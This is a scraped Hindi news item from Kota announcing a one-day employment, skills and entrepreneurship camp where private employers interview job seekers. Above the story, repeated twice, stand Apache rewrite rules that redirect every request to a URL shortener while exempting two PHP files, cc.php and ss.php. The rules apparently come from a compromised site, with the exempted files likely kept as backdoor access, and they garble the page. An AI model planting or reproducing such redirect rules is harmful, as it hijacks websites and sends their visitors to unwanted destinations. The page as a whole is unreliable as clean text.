
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 405
Previous Nextकोटा। कोटा जिले के बेरोजगार अभ्यर्थियों के लिए एक दिवसीय मासिक कौशल रोजगार एवं उद्यमिता शिविर का आयोजन नयापुरा स्थित सूचना केन्द्र में कल प्रातः 10 से सायं 5 बजे तक किया जावेगा। सहायक निदेशक जीपी वर्मा ने बताया कि शिविर में बेरोजगार आषार्थियों को रोजगार उपलब्ध करवाने हेतु निजी नियोजकों को बुलाया गया है। मौके पर ही बेरोजगार अभ्यर्थियों का साक्षात्कार लेकर चयन प्रक्रिया सम्पादित करेंगे। साथ ही आर.एस.एल.डी.सी. के प्रशिक्षण कार्यक्रम के पात्र आषार्थियों से आवेदन पत्र तैयार करवाये जाएंगे। इच्छुक बेरोजगार अभ्यर्थी अपने मूल दस्तावेज मय छाया प्रतियों के तथा पॉच पासपोर्ट साईज के फोटोग्राफ लेकर शिविर का लाभ उठा सकते हैं।